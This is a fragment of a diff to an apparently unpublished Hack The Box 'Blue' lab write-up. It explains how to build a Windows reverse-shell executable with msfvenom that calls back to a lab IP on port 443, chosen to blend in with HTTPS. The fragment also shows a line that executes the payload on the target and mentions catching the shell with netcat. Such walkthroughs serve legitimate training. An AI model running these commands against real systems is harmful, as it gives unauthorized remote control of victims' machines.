tpetersonkth/tpetersonkth.github.io/_unpublishedPosts/HTB-Blue-Writeup.md

     service_exec(conn, r'cmd /c C:\rs.exe')
 {% endhighlight %}

 A reverse shell executable can be generated with [msfvenom](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) by executing `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f exe -o rs.exe`.
 The `-p` flag selects the payload `windows/shell_reverse_tcp` which is a payload that connects back to us on a specific port, providing us with a shell.
 This payload is stageless and we can thus simply listen for a connection using a netcat listener.
 The `LHOST` and `LPORT` parameters specifiy our IP address and the port we want the target to connect to.
 In our case, we choose port 443 since it is usually used for HTTPS traffic and thus traffic to this port might look less suspicious than a random port.
-Finally, the `-f` flag is used to specify that we want to output the payload as a [Portable Excecutable](https://en.wikipedia.org/wiki/Portable_Executable) and the `-o` flag specify the output file.
+Finally, the `-f` flag is used to specify that we want to output the payload as a [Portable Excecutable](https://en.wikipedia.org/wiki/Portable_Executable) and the `-o` flag specifies the output file `rs.exe`.

 {% highlight none linenos %}
 kali@kali:/tmp/x$ @@msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f exe -o rs.exe@@